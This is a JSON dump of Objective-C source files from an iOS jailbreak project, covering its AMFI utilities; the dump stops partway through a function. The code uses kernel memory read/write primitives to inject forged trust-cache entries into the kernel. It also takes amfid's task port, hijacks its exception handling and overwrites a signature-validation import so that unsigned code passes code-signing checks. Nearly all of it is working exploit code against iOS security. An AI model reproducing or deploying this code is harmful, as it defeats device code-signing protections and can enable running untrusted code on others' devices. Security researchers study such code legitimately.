[ { "path": ".gitignore", "content": ".DS_Store\n" }, { "path": "AMFI Utilities/amfi_utils.h", "content": "#import \n#import \n#import \"../AMFI Utilities/cs_blob.h\"\n\n#define MACHO(p) ((*(unsigned int *)(p) & ~1) == 0xfeedface)\n\ntypedef char hash_t[20];\n\nstruct trust_chain {\n uint64_t next;\n unsigned char uuid[16];\n unsigned int count;\n} __attribute__((packed));\n\n\nvoid *load_bytes(FILE *file, off_t offset, size_t size);\nint strtail(const char *str, const char *tail);\nvoid getSHA256inplace(const uint8_t* code_dir, uint8_t *out);\nuint8_t *getSHA256(const uint8_t* code_dir);\nuint8_t *getCodeDirectory(const char* name);\nuint64_t ubc_cs_blob_allocate(vm_size_t size);\nvoid kern_free(uint64_t addr, vm_size_t size);\nint cs_validate_csblob(const uint8_t *addr, size_t length, CS_CodeDirectory **rcd, CS_GenericBlob **rentitlements);\nuint64_t getCodeSignatureLC(FILE *file, int64_t *machOff);\nint addBinaryToAMFITrustCache(const char *path);\nint amfiTrustHash(hash_t hash);\nconst struct cs_hash *cs_find_md(uint8_t type);\n" }, { "path": "AMFI Utilities/amfi_utils.m", "content": "// Comes from Electra, adapted for FAT binary support by Jake James\n//\n// amfi_utils.c\n// electra\n//\n// Created by Jamie on 27/01/2018.\n// Copyright © 2018 Electra Team. All rights reserved.\n//\n\n#include \"amfi_utils.h\"\n#include \"kernel_utils.h\"\n#include \"patchfinder64.h\"\n#include \n#include \n#include \n#include \n#include \n#include \"../Kernel Utilities/kexecute.h\"\n#include \"../Kernel Utilities/kernel_utils.h\"\n#include \"../Exploits/sock_port/kernel_memory.h\"\n#include \n\nuint32_t swap_uint32( uint32_t val ) {\n val = ((val << 8) & 0xFF00FF00 ) | ((val >> 8) & 0xFF00FF );\n return (val << 16) | (val >> 16);\n}\n\nuint32_t read_magic(FILE* file, off_t offset) {\n uint32_t magic;\n fseek(file, offset, SEEK_SET);\n fread(&magic, sizeof(uint32_t), 1, file);\n return magic;\n}\n\nvoid *load_bytes(FILE *file, off_t offset, size_t size) {\n void *buf = calloc(1, size);\n fseek(file, offset, SEEK_SET);\n fread(buf, size, 1, file);\n return buf;\n}\n\nvoid getSHA256inplace(const uint8_t* code_dir, uint8_t *out) {\n if (code_dir == NULL) {\n printf(\"AMFI TOOLS: NULL passed to getSHA256inplace!\\n\");\n return;\n }\n uint32_t* code_dir_int = (uint32_t*)code_dir;\n uint32_t realsize = 0;\n for (int j = 0; j < 10; j++) {\n if (swap_uint32(code_dir_int[j]) == 0xfade0c02) {\n realsize = swap_uint32(code_dir_int[j+1]);\n code_dir += 4*j;\n }\n }\n CC_SHA256(code_dir, realsize, out);\n}\n\nuint8_t *getSHA256(const uint8_t* code_dir) {\n uint8_t *out = malloc(CC_SHA256_DIGEST_LENGTH);\n getSHA256inplace(code_dir, out);\n return out;\n}\n\nuint8_t *getCodeDirectory(const char* name) {\n FILE* fd = fopen(name, \"r\");\n uint32_t magic;\n fread(&magic, sizeof(magic), 1, fd);\n fseek(fd, 0, SEEK_SET);\n long off = 0, file_off = 0;\n int ncmds = 0;\n BOOL foundarm64 = false;\n if (magic == MH_MAGIC_64) {\n struct mach_header_64 mh64;\n fread(&mh64, sizeof(mh64), 1, fd);\n off = sizeof(mh64);\n ncmds = mh64.ncmds;\n }\n else if (magic == MH_MAGIC) {\n printf(\"AMFI TOOLS: %s is 32bit. What are you doing here?\\n\", name);\n fclose(fd);\n return NULL;\n }\n else if (magic == 0xBEBAFECA) {\n size_t header_size = sizeof(struct fat_header);\n size_t arch_size = sizeof(struct fat_arch);\n size_t arch_off = header_size;\n struct fat_header *fat = (struct fat_header*)load_bytes(fd, 0, header_size);\n struct fat_arch *arch = (struct fat_arch *)load_bytes(fd, arch_off, arch_size);\n int n = swap_uint32(fat->nfat_arch);\n printf(\"AMFI TOOLS: Binary is FAT with %d architectures\\n\", n);\n while (n-- > 0) {\n magic = read_magic(fd, swap_uint32(arch->offset));\n if (magic == 0xFEEDFACF) {\n printf(\"AMFI TOOLS: Found arm64\\n\");\n foundarm64 = true;\n struct mach_header_64* mh64 = (struct mach_header_64*)load_bytes(fd, swap_uint32(arch->offset), sizeof(struct mach_header_64));\n file_off = swap_uint32(arch->offset);\n off = swap_uint32(arch->offset) + sizeof(struct mach_header_64);\n ncmds = mh64->ncmds;\n break;\n }\n arch_off += arch_size;\n arch = load_bytes(fd, arch_off, arch_size);\n }\n if (!foundarm64) {\n printf(\"AMFI TOOLS: No arm64? RIP\\n\");\n fclose(fd);\n return NULL;\n }\n }\n else {\n printf(\"AMFI TOOLS: %s is not a macho! (or has foreign endianness?) (magic: %x)\\n\", name, magic);\n fclose(fd);\n return NULL;\n }\n for (int i = 0; i < ncmds; i++) {\n struct load_command cmd;\n fseek(fd, off, SEEK_SET);\n fread(&cmd, sizeof(struct load_command), 1, fd);\n if (cmd.cmd == LC_CODE_SIGNATURE) {\n uint32_t off_cs;\n fread(&off_cs, sizeof(uint32_t), 1, fd);\n uint32_t size_cs;\n fread(&size_cs, sizeof(uint32_t), 1, fd);\n \n uint8_t *cd = malloc(size_cs);\n fseek(fd, off_cs + file_off, SEEK_SET);\n fread(cd, size_cs, 1, fd);\n fclose(fd);\n return cd;\n } else {\n off += cmd.cmdsize;\n }\n }\n fclose(fd);\n return NULL;\n}\n\n//from xerub\nint strtail(const char *str, const char *tail)\n{\n size_t lstr = strlen(str);\n size_t ltail = strlen(tail);\n if (ltail > lstr) {\n return -1;\n }\n str += lstr - ltail;\n return memcmp(str, tail, ltail);\n}\n\nint cs_validate_csblob(const uint8_t *addr, size_t length, CS_CodeDirectory **rcd, CS_GenericBlob **rentitlements) {\n uint64_t rcdptr = kalloc(sizeof(uint64_t));\n uint64_t entptr = kalloc(sizeof(uint64_t));\n \n int ret = (int)kexecute(Find_cs_validate_csblob(), (uint64_t)addr, length, rcdptr, entptr, 0, 0, 0);\n *rcd = (CS_CodeDirectory *)rk64(rcdptr);\n *rentitlements = (CS_GenericBlob *)rk64(entptr);\n \n kfree(rcdptr, sizeof(uint64_t));\n kfree(entptr, sizeof(uint64_t));\n \n return ret;\n}\n\nuint64_t ubc_cs_blob_allocate(vm_size_t size) {\n if (size <= 0x1ff8) {\n uint64_t size_p = kalloc(sizeof(vm_size_t));\n if (!size_p) return 0;\n kwrite(size_p, &size, sizeof(vm_size_t));\n \n uint64_t kall = Find_kalloc_canblock();\n if (!kall) return 0;\n \n uint64_t site = Find_cs_blob_allocate_site();\n if (!site) return 0;\n \n uint64_t alloced = kexecute(kall, size_p, 1, site, 0, 0, 0, 0);\n if (!alloced) return 0;\n \n kfree(size_p, sizeof(vm_size_t));\n alloced = ZmFixAddr(alloced);\n return alloced;\n }\n else {\n size = (size + 0x3fff) & ~0x3fff;\n \n uint64_t addrp = kalloc(sizeof(uint64_t));\n if (!addrp) return 0;\n \n uint64_t kernel_map = Find_kernel_map();\n if (!kernel_map) return 0;\n \n kernel_map = rk64(kernel_map);\n if (!kernel_map) return 0;\n \n uint64_t alloc = Find_kernel_memory_allocate();\n if (!alloc) return 0;\n \n kexecute(alloc, kernel_map, addrp, size, 0, 4, 17, 0);\n addrp = rk64(addrp);\n return addrp;\n }\n}\n\nvoid kern_free(uint64_t addr, vm_size_t size) {\n if (size > 0x1ff8) size = (size + 0x3fff) & ~0x3fff;\n kexecute(Find_kfree(), addr, size, 0, 0, 0, 0, 0);\n}\n\nconst struct cs_hash *cs_find_md(uint8_t type) {\n return (struct cs_hash *)rk64(Find_cs_find_md() + ((type - 1) * 8));\n}\n\nuint64_t getCodeSignatureLC(FILE *file, int64_t *machOff) {\n size_t offset = 0;\n struct load_command *cmd = NULL;\n *machOff = -1;\n uint32_t *magic = load_bytes(file, offset, sizeof(uint32_t));\n int ncmds = 0;\n \n if (*magic != 0xFEEDFACF && *magic != 0xBEBAFECA) {\n printf(\"AMFI TOOLS: File is not an arm64 or FAT macho!\\n\");\n free(magic);\n return 0;\n }\n \n if(*magic == 0xBEBAFECA) {\n uint32_t arch_off = sizeof(struct fat_header);\n struct fat_header *fat = (struct fat_header*)load_bytes(file, 0, sizeof(struct fat_header));\n bool foundarm64 = false;\n int n = ntohl(fat->nfat_arch);\n printf(\"AMFI TOOLS: Binary is FAT with %d architectures\\n\", n);\n while (n-- > 0) {\n struct fat_arch *arch = (struct fat_arch *)load_bytes(file, arch_off, sizeof(struct fat_arch));\n if (ntohl(arch->cputype) == 0x100000c) {\n printf(\"AMFI TOOLS: Found arm64\\n\");\n offset = ntohl(arch->offset);\n foundarm64 = true;\n free(fat);\n free(arch);\n break;\n }\n free(arch);\n arch_off += sizeof(struct fat_arch);\n }\n if (!foundarm64) {\n printf(\"AMFI TOOLS: Binary does not have any arm64 slice\\n\");\n free(fat);\n free(magic);\n return 0;\n }\n }\n free(magic);\n *machOff = offset;\n struct mach_header_64 *mh64 = load_bytes(file, offset, sizeof(struct mach_header_64));\n ncmds = mh64->ncmds;\n free(mh64);\n offset += sizeof(struct mach_header_64);\n \n for (int i = 0; i < ncmds; i++) {\n cmd = load_bytes(file, offset, sizeof(struct load_command));\n if (cmd->cmd == LC_CODE_SIGNATURE) {\n free(cmd);\n return offset;\n }\n offset += cmd->cmdsize;\n free(cmd);\n }\n return 0;\n}\n\nint addBinaryToAMFITrustCache(const char *path) {\n NSMutableArray *paths = [NSMutableArray array];\n NSFileManager *fileManager = [NSFileManager defaultManager];\n BOOL isDir = NO;\n if (![fileManager fileExistsAtPath:@(path) isDirectory:&isDir]) {\n printf(\"AMFI TRUST: Path does not exist!\\n\");\n return -1;\n }\n NSURL *directoryURL = [NSURL URLWithString:@(path)];\n NSArray *keys = [NSArray arrayWithObject:NSURLIsDirectoryKey];\n if (isDir) {\n NSDirectoryEnumerator *enumerator = [fileManager\n enumeratorAtURL:directoryURL\n includingPropertiesForKeys:keys\n options:0\n errorHandler:^(NSURL *url, NSError *error) {\n if (error) printf(\"AMFI TRUST: %s\\n\", [[error localizedDescription] UTF8String]);\n return YES;\n }];\n \n for (NSURL *url in enumerator) {\n NSError *error;\n NSNumber *isDirectory = nil;\n if (![url getResourceValue:&isDirectory forKey:NSURLIsDirectoryKey error:&error]) {\n if (error) continue;\n }\n else if (![isDirectory boolValue]) {\n int rv;\n int fd;\n uint8_t *p;\n off_t sz;\n struct stat st;\n uint8_t buf[16];\n char *fpath = strdup([[url path] UTF8String]);\n if (strtail(fpath, \".plist\") == 0 || strtail(fpath, \".nib\") == 0 || strtail(fpath, \".strings\") == 0 || strtail(fpath, \".png\") == 0) {\n continue;\n }\n rv = lstat(fpath, &st);\n if (rv || !S_ISREG(st.st_mode) || st.st_size < 0x4000) {\n continue;\n }\n fd = open(fpath, O_RDONLY);\n if (fd < 0) {\n continue;\n }\n sz = read(fd, buf, sizeof(buf));\n if (sz != sizeof(buf)) {\n close(fd);\n continue;\n }\n if (*(uint32_t *)buf != 0xBEBAFECA && !MACHO(buf)) {\n close(fd);\n continue;\n }\n p = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);\n if (p == MAP_FAILED) {\n close(fd);\n continue;\n }\n [paths addObject:@(fpath)];\n printf(\"AMFI TRUST: ADDING TO TRUST CACHE %s\\n\", fpath);\n free(fpath);\n }\n }\n if ([paths count] == 0) {\n printf(\"AMFI TRUST: No files in %s passed the integrity checks!\\n\", path);\n return -2;\n }\n }\n else {\n printf(\"AMFI TRUST: ADDING TO TRUST CACHE %s\\n\", path);\n [paths addObject:@(path)];\n int rv;\n int fd;\n uint8_t *p;\n off_t sz;\n struct stat st;\n uint8_t buf[16];\n \n if (strtail(path, \".plist\") == 0 || strtail(path, \".nib\") == 0 || strtail(path, \".strings\") == 0 || strtail(path, \".png\") == 0) {\n printf(\"AMFI TRUST Binary not an executable! Kernel doesn't like trusting data, geez\\n\");\n return 2;\n }\n \n rv = lstat(path, &st);\n if (rv || !S_ISREG(st.st_mode) || st.st_size < 0x4000) {\n printf(\"AMFI TRUST Binary too big\\n\");\n return 3;\n }\n \n fd = open(path, O_RDONLY);\n if (fd < 0) {\n printf(\"AMFI TRUST Don't have permission to open file\\n\");\n return 4;\n }\n \n sz = read(fd, buf, sizeof(buf));\n if (sz != sizeof(buf)) {\n close(fd);\n printf(\"AMFI TRUST Failed to read from binary\\n\");\n return 5;\n }\n if (*(uint32_t *)buf != 0xBEBAFECA && !MACHO(buf)) {\n close(fd);\n printf(\"AMFI TRUST Binary not a macho!\\n\");\n return 6;\n }\n \n p = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);\n if (p == MAP_FAILED) {\n close(fd);\n printf(\"AMFI TRUST Failed to mmap file\\n\");\n return 7;\n }\n }\n uint64_t trust_chain = Find_trustcache();\n printf(\"AMFI TRUST trust_chain at 0x%llx\\n\", trust_chain);\n struct trust_chain fake_chain;\n fake_chain.next = rk64(trust_chain);\n arc4random_buf(fake_chain.uuid, 16);\n int cnt = 0;\n uint8_t hash[CC_SHA256_DIGEST_LENGTH];\n hash_t *allhash = malloc(sizeof(hash_t) * [paths count]);\n for (int i = 0; i != [paths count]; ++i) {\n uint8_t *cd = getCodeDirectory((char*)[[paths objectAtIndex:i] UTF8String]);\n if (cd != NULL) {\n getSHA256inplace(cd, hash);\n memmove(allhash[cnt], hash, sizeof(hash_t));\n ++cnt;\n }\n else {\n printf(\"AMFI TRUST CD NULL\\n\");\n continue;\n }\n }\n fake_chain.count = cnt;\n size_t length = (sizeof(fake_chain) + cnt * sizeof(hash_t) + 0x3FFF) & ~0x3FFF;\n uint64_t kernel_trust = kalloc(length);\n printf(\"AMFI TRUST allocated: 0x%zx => 0x%llx\\n\", length, kernel_trust);\n kwrite(kernel_trust, &fake_chain, sizeof(fake_chain));\n kwrite(kernel_trust + sizeof(fake_chain), allhash, cnt * sizeof(hash_t));\n#if __arm64e__\n Kernel_Execute(Find_pmap_load_trust_cache_ppl(), kernel_trust, length, 0, 0, 0, 0, 0);\n#else\n wk64(trust_chain, kernel_trust);\n#endif\n free(allhash);\n return 0;\n}\n\nint amfiTrustHash(hash_t hash) {\n uint64_t trust_chain = Find_trustcache();\n printf(\"AMFI TRUST trust_chain at 0x%llx\\n\", trust_chain);\n struct trust_chain fake_chain;\n fake_chain.next = rk64(trust_chain);\n arc4random_buf(fake_chain.uuid, 16);\n fake_chain.count = 1;\n size_t length = (sizeof(fake_chain) + sizeof(hash_t) + 0x3FFF) & ~0x3FFF;\n uint64_t kernel_trust = kalloc(length);\n printf(\"AMFI TRUST allocated: 0x%zx => 0x%llx\\n\", length, kernel_trust);\n kwrite(kernel_trust, &fake_chain, sizeof(fake_chain));\n kwrite(kernel_trust + sizeof(fake_chain), hash, sizeof(hash_t));\n#if __arm64e__\n kexecute(Find_pmap_load_trust_cache_ppl(), kernel_trust, length, 0, 0, 0, 0, 0);\n#else\n wk64(trust_chain, kernel_trust);\n#endif\n return 0;\n}\n" }, { "path": "AMFI Utilities/amfid.h", "content": "#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n\nvoid* AMFIDExceptionHandler(void* arg);\nint setAmfidExceptionHandler(mach_port_t amfid_task_port, void *(exceptionHandler)(void*));\nuint64_t patchAMFID(void);\n\n#pragma pack(4)\ntypedef struct {\n mach_msg_header_t Head;\n mach_msg_body_t msgh_body;\n mach_msg_port_descriptor_t thread;\n mach_msg_port_descriptor_t task;\n NDR_record_t NDR;\n} exception_raise_request; // the bits we need at least\n\ntypedef struct {\n mach_msg_header_t Head;\n NDR_record_t NDR;\n kern_return_t RetCode;\n} exception_raise_reply;\n#pragma pack()\n\n#define amfid_MISValidateSignatureAndCopyInfo_import_offset 0x4150\n" }, { "path": "AMFI Utilities/amfid.m", "content": "// From JelbrekLib, by Jake James!\n\n#import \"../AMFI Utilities/amfid.h\"\n#import \"../AMFI Utilities/amfid_mem.h\"\n#import \"../AMFI Utilities/amfi_utils.h\"\n#import \"../AMFI Utilities/amfid_tools.h\"\n#import \"../Kernel Utilities/kernel_utils.h\"\n#import \"../AMFI Utilities/cs_blob.h\"\n#import \"../Exploits/sock_port/offsetof.h\"\n#import \n#include \"../PatchFinder/patchfinder64.h\"\n#include \"../AMFI Utilities/osobject.h\"\n#include \"../Blizzard Jailbreak/blizzardJailbreak.h\"\n\npthread_t exceptionThread;\nstatic mach_port_name_t AMFID_ExceptionPort = MACH_PORT_NULL;\nuint64_t origAMFID_MISVSACI = 0;\nuint64_t amfid_base_old;\n\nBOOL entitlePidOnAMFI(pid_t pid, const char *ent, BOOL val) {\n if (!pid) return NO;\n uint64_t proc = proc_of_pid(pid);\n uint64_t ucred = rk64(proc + off_p_ucred);\n uint64_t cr_label = rk64(ucred + off_ucred_cr_label);\n uint64_t entitlements = rk64(cr_label + off_amfi_slot);\n if (OSDictionary_GetItem(entitlements, ent) == 0) {\n printf(\"AMFI TOOLS: Setting Entitlements...\\n\");\n uint64_t entval = OSDictionary_GetItem(entitlements, ent);\n printf(\"AMFI TOOLS: before: %s is 0x%llx\\n\", ent, entval);\n OSDictionary_SetItem(entitlements, ent, (val) ? Find_OSBoolean_True() : Find_OSBoolean_False());\n entval = OSDictionary_GetItem(entitlements, ent);\n printf(\"AMFI TOOLS: after: %s is 0x%llx\\n\", ent, entval);\n return (entval) ? YES : NO;\n }\n return YES;\n}\n\nuint64_t binary_load_address(mach_port_t tp) {\n kern_return_t err;\n mach_msg_type_number_t region_count = VM_REGION_BASIC_INFO_COUNT_64;\n memory_object_name_t object_name = MACH_PORT_NULL; /* unused */\n mach_vm_size_t target_first_size = 0x1000;\n mach_vm_address_t target_first_addr = 0x0;\n struct vm_region_basic_info_64 region = {0};\n printf(\"AMFI TOOLS: About to call mach_vm_region\\n\");\n err = mach_vm_region(tp, &target_first_addr, &target_first_size, VM_REGION_BASIC_INFO_64, (vm_region_info_t)®ion, ®ion_count, &object_name);\n if (err != KERN_SUCCESS) {\n printf(\"AMFI TOOLS: Failed to get the region: %s\\n\", mach_error_string(err));\n return -1;\n }\n printf(\"AMFI TOOLS: Got base address\\n\");\n return target_first_addr;\n}\n\n#if !__arm64e__\nvoid* AMFIDExceptionHandler(void* arg) {\n uint32_t size = 0x1000;\n mach_msg_header_t* msg = malloc(size);\n for(;;) {\n kern_return_t ret;\n printf(\"AMFI TOOLS: AMFID: Calling mach_msg to receive exception message from amfid\\n\");\n ret = mach_msg(msg, MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, 0, size, AMFID_ExceptionPort, 0, 0);\n if (ret != KERN_SUCCESS){\n printf(\"AMFI TOOLS: AMFID: Error receiving exception port: %s\\n\", mach_error_string(ret));\n continue;\n } else {\n printf(\"AMFI TOOLS: AMFID: Got called!\\n\");\n exception_raise_request* req = (exception_raise_request*)msg;\n mach_port_t thread_port = req->thread.name;\n mach_port_t task_port = req->task.name;\n _STRUCT_ARM_THREAD_STATE64 old_state = {0};\n mach_msg_type_number_t old_stateCnt = sizeof(old_state)/4;\n ret = thread_get_state(thread_port, ARM_THREAD_STATE64, (thread_state_t)&old_state, &old_stateCnt);\n if (ret != KERN_SUCCESS){\n printf(\"AMFI TOOLS: Error getting thread state: %s\\n\", mach_error_string(ret));\n continue;\n }\n printf(\"AMFI TOOLS: Got thread state!\\n\");\n _STRUCT_ARM_THREAD_STATE64 new_state;\n memcpy(&new_state, &old_state, sizeof(_STRUCT_ARM_THREAD_STATE64));\n char* filename = (char*)AmfidRead(new_state.__x[25], 1024);\n uint8_t *orig_cdhash = (uint8_t*)AmfidRead(new_state.__x[24], CS_CDHASH_LEN);\n printf(\"AMFI TOOLS: Got request for: %s\\n\", filename);\n printf(\"AMFI TOOLS: Original cdhash: \\n\\t\");\n for (int i = 0; i < CS_CDHASH_LEN; i++) {\n printf(\"AMFI TOOLS: Original CDHash%02x \", orig_cdhash[i]);\n }\n printf(\"\\n\");\n if (strlen((char*)orig_cdhash)) {\n amfid_base_old = binary_load_address(task_port);\n printf(\"AMFI TOOLS: Jumping thread to 0x%llx\\n\", origAMFID_MISVSACI);\n new_state.__pc = origAMFID_MISVSACI;\n } else {\n uint8_t* code_directory = getCodeDirectory(filename);\n if (!code_directory) {\n printf(\"AMFI TOOLS: Can't get code directory\\n\");\n goto end;\n }\n uint8_t cd_hash[CS_CDHASH_LEN];\n if (parse_superblob(code_directory, cd_hash)) {\n printf(\"AMFI TOOLS: parse_superblob failed\\n\");\n goto end;\n }\n printf(\"AMFI TOOLS: New cdhash: \\n\\t\");\n for (int i = 0; i < CS_CDHASH_LEN; i++) {\n printf(\"AMFI TOOLS: CDHash%02x \", cd_hash[i]);\n }\n printf(\"\\n\");\n new_state.__pc = origAMFID_MISVSACI;\n ret = mach_vm_write(task_port, old_state.__x[24], (vm_offset_t)&cd_hash, 20);\n if (ret == KERN_SUCCESS)\n {\n printf(\"AMFI TOOLS: Wrote the cdhash into amfid\\n\");\n } else {\n printf(\"AMFI TOOLS: Unable to write the cdhash into amfid!\\n\");\n }\n AmfidWrite_32bits(old_state.__x[20], 1);\n new_state.__pc = (old_state.__lr & 0xfffffffffffff000) + 0x1000; // 0x2dacwhere to continue\n \n printf(\"AMFI TOOLS: Old PC: 0x%llx, new PC: 0x%llx\\n\", old_state.__pc, new_state.__pc);\n }\n\n ret = thread_set_state(thread_port, 6, (thread_state_t)&new_state, sizeof(new_state)/4);\n if (ret != KERN_SUCCESS) {\n printf(\"AMFI TOOLS: Failed to set new thread state %s\\n\", mach_error_string(ret));\n } else {\n printf(\"AMFI TOOLS: Success setting new state for amfid!\\n\");\n }\n \n exception_raise_reply reply = {0};\n reply.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(req->Head.msgh_bits), 0);\n reply.Head.msgh_size = sizeof(reply);\n reply.Head.msgh_remote_port = req->Head.msgh_remote_port;\n reply.Head.msgh_local_port = MACH_PORT_NULL;\n reply.Head.msgh_id = req->Head.msgh_id + 0x64;\n reply.NDR = req->NDR;\n reply.RetCode = KERN_SUCCESS;\n ret = mach_msg(&reply.Head, 1, (mach_msg_size_t)sizeof(reply), 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);\n mach_port_deallocate(mach_task_self(), thread_port);\n mach_port_deallocate(mach_task_self(), task_port);\n if (ret != KERN_SUCCESS){\n printf(\"AMFI TOOLS: Failed to send the reply to the exception message %s\\n\", mach_error_string(ret));\n } else{\n printf(\"AMFI TOOLS: Replied to the amfid exception...\\n\");\n }\n end:;\n free(filename);\n free(orig_cdhash);\n }\n }\n return NULL;\n}\n\nint setAmfidExceptionHandler(mach_port_t amfid_task_port, void *(exceptionHandler)(void*)){\n if (!MACH_PORT_VALID(amfid_task_port)) {\n printf(\"AMFI TOOLS: Invalid amfid task port\\n\");\n return 1;\n }\n mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &AMFID_ExceptionPort);\n mach_port_insert_right(mach_task_self(), AMFID_ExceptionPort, AMFID_ExceptionPort, MACH_MSG_TYPE_MAKE_SEND);\n if (!MACH_PORT_VALID(AMFID_ExceptionPort)) {\n printf(\"AMFI TOOLS: Invalid amfid exception port\\n\");\n return 1;\n }\n \n printf(\"AMFI TOOLS: amfid_task_port = 0x%x\\n\", amfid_task_port);\n printf(\"AMFI TOOLS: AMFID_ExceptionPort = 0x%x\\n\", AMFID_ExceptionPort);\n kern_return_t ret = task_set_exception_ports(amfid_task_port, EXC_MASK_ALL, AMFID_ExceptionPort, EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, ARM_THREAD_STATE64);\n if (ret != KERN_SUCCESS){\n printf(\"AMFI TOOLS: Error setting amfid exception port: %s\\n\", mach_error_string(ret));\n } else {\n printf(\"AMFI TOOLS: Success setting amfid exception port!\\n\");\n pthread_create(&exceptionThread, NULL, exceptionHandler, NULL);\n return 0;\n }\n return 1;\n}\n\nuint64_t patchAMFID() {\n printf(\"AMFI TOOLS: Patching AMFID...\\n\");\n pid_t amfid_pid = pid_of_procName(\"amfid\");\n printf(\"AMFI TOOLS: amfid's PID: %d\\n\", amfid_pid);\n entitlePidOnAMFI(amfid_pid, \"get-task-allow\", YES);\n setcsflags(amfid_pid);\n printf(\"AMFI TOOLS: Getting task port\\n\");\n mach_port_t amfid_task_port;\n kern_return_t kr = task_for_pid(mach_task_self(), amfid_pid, &amfid_task_port);\n \n if (kr) {\n printf(\"AMFI TOOLS: Failed to get amfid's task :(\\n\\tError: %s\\n\", mach_error_string(kr));\n return -1;\n }\n \n if (!MACH_PORT_VALID(amfid_task_port)) {\n printf(\"AMFI TOOLS: Failed to get amfid's task port!\\n\");\n return -1;\n }\n \n printf(\"AMFI TOOLS: Got amfid's task port? :) 0x%x\\n\", amfid_task_port);\n init_amfid_mem(amfid_task_port);\n setAmfidExceptionHandler(amfid_task_port, AMFIDExceptionHandler);\n printf(\"AMFI TOOLS: About to search for the binary load address\\n\");\n amfid_base_old = binary_load_address(amfid_task_port);\n printf(\"AMFI TOOLS: Amfid load address: 0x%llx\\n\", amfid_base_old);\n mach_vm_size_t sz;\n kr = mach_vm_read_overwrite(amfid_task_port, amfid_base_old+amfid_MISValidateSignatureAndCopyInfo_import_offset, 8, (mach_vm_address_t)&origAMFID_MISVSACI, &sz);\n \n if (kr != KERN_SUCCESS) {\n printf(\"AMFI TOOLS: Error reading MISVSACI: %s\\n\", mach_error_string(kr));\n return -1;\n }\n printf(\"AMFI TOOLS: Original MISVSACI 0x%llx\\n\", origAMFID_MISVSACI);\n AmfidWrite_64bits(amfid_base_old + amfid_MISValidateSignatureAndCopyInfo_import_offset, 0x4141414141414141);\n printf(\"[i] AMFI TOOLS: AMFID hopefully patched\\n\");\n return origAMFID_MISVSACI;\n}\n#endif\n" }, { "path": "AMFI Utilities/amfid_mem.h", "content": "#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n\nvoid init_amfid_mem(mach_port_t amfid_tp);\nvoid* AmfidRead(uint64_t addr, uint64_t len);\nvoid AmfidWrite_8bits(uint64_t addr, uint8_t val);\nvoid AmfidWrite_64bits(uint64_t addr, uint64_t val);\nvoid AmfidWrite_32bits(uint64_t addr, uint32_t val);\nvoid* AmfidRead(uint64_t addr, uint64_t len);\n" }, { "path": "AMFI Utilities/amfid_mem.m", "content": "#import \"amfid_mem.h\"\n#import \"kernel_utils.h\"\n#import \n\nstatic mach_port_t amfid_task_port;\n\nvoid init_amfid_mem(mach_port_t amfid_tp) {\n amfid_task_port = amfid_tp;\n}\n\nvoid* AmfidRead(uint64_t addr, uint64_t len) {\n kern_return_t ret;\n vm_offset_t buf = 0;\n mach_msg_type_number_t num = 0;\n ret = mach_vm_read(amfid_task_port, addr, len, &buf, &num);\n \n if (ret != KERN_SUCCESS) {\n printf(\"AMFI TOOLS: amfid read failed (0x%llx)\\n\", addr);\n return NULL;\n }\n uint8_t* outbuf = malloc(len);\n memcpy(outbuf, (void*)buf, len);\n mach_vm_deallocate(mach_task_self(), buf, num);\n return outbuf;\n}\n\nvoid AmfidWrite_8bits(uint64_t addr, uint8_t val) {\n kern_return_t err = mach_vm_write(amfid_task_port, addr, (vm_offset_t)&val, 1);\n if (err != KERN_SUCCESS) {\n printf(\"AMFI TOOLS: amfid write failed (0x%llx)\\n\", addr);\n }\n}\n\nvoid AmfidWrite_32bits(uint64_t addr, uint32_t val) {\n kern_return_t err = mach_vm_write(amfid_task_port, addr, (vm_offset_t)&val, 4);\n if (err != KERN_SUCCESS) {\n printf(\"AMFI TOOLS: amfid write failed (0x%llx)\\n\", addr);\n }\n}\n\n\nvoid AmfidWrite_64bits(uint64_t addr, uint64_t val) {\n kern_return_t err = mach_vm_write(amfid_task_port, addr, (vm_offset_t)&val, 8);\n if (err != KERN_SUCCESS) {\n printf(\"AMFI TOOLS: amfid write failed (0x%llx)\\n\", addr);\n }\n}\n\n" }, { "path": "AMFI Utilities/amfid_tools.h", "content": "#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \"../AMFI Utilities/cs_blob.h\"\n\n\nstatic unsigned int hash_rank(const CodeDirectory *cd);\nint get_hash(const CodeDirectory* directory, uint8_t dst[CS_CDHASH_LEN]);\nint parse_superblob(uint8_t *code_dir, uint8_t dst[CS_CDHASH_LEN]);\n" }, { "path": "AMFI Utilities/amfid_tools.m", "content": "#import \"amfid_tools.h\"\n#import \"amfi_utils.h\"\n#import \"amfid.h\"\n\nstatic unsigned int hash_rank(const CodeDirectory *cd){\n uint32_t type = cd->hashType;\n unsigned int n;\n for (n = 0; n < sizeof(hashPriorities) / sizeof(hashPriorities[0]); ++n)\n if (hashPriorities[n] == type){\n return n + 1;\n }\n return 0;\n}\n\nint get_hash(const CodeDirectory* directory, uint8_t dst[CS_CDHASH_LEN]) {\n uint32_t realsize = ntohl(directory->length);\n if (ntohl(directory->magic) != CSMAGIC_CODEDIRECTORY) {\n printf(\"AMFI TOOLS: [get_hash] wtf, not CSMAGIC_CODEDIRECTORY?!\\n\");\n return 1;\n }\n uint8_t out[CS_HASH_MAX_SIZE];\n uint8_t hash_type = directory->hashType;\n switch (hash_type) {\n case CS_HASHTYPE_SHA1:\n CC_SHA1(directory, realsize, out);\n break;\n case CS_HASHTYPE_SHA256:\n case CS_HASHTYPE_SHA256_TRUNCATED:\n CC_SHA256(directory, realsize, out);\n break;\n case CS_HASHTYPE_SHA384:\n CC_SHA384(directory, realsize, out);\n break;\n default:\n printf(\"AMFI TOOLS:[get_hash] Unknown hash type: 0x%x\\n\", hash_type);\n return 2;\n }\n memcpy(dst, out, CS_CDHASH_LEN);\n return 0;\n}\n\nint parse_superblob(uint8_t *code_dir, uint8_t 